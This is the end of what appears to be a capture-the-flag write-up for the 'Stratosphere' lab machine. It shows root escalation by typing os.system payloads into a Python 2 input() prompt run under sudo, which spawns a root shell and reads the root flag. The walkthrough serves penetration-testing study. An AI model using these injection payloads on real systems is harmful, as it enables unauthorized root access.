__import__('os').system('whoami')
root
Traceback (most recent call last):
File "/home/richard/test.py", line 38, in <module>
question()
File "/home/richard/test.py", line 8, in question
md5.update(q1.encode())
AttributeError: 'int' object has no attribute 'encode'
If we execute the command /bin/bash, we obtain a shell as root.
richard@stratosphere:~$ sudo /usr/bin/python2 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('/bin/bash')
root@stratosphere:/home/richard# whoami
root
root@stratosphere:/home/richard# cat /root/root.txt
<ROOT_FLAG>
root@stratosphere:/home/richard# exit
exit
Traceback (most recent call last):
File "/home/richard/test.py", line 38, in <module>
question()
File "/home/richard/test.py", line 8, in question
md5.update(q1.encode())
AttributeError: 'int' object has no attribute 'encode'
References
- https://www.cvedetails.com/cve/CVE-2017-5638/
- netstat without netstat
- Vulnerability in input() function – Python 2.x
- Python How To Import And Use Module With One Line
Daniel Simao 09:07, 21 January 2021 (EST)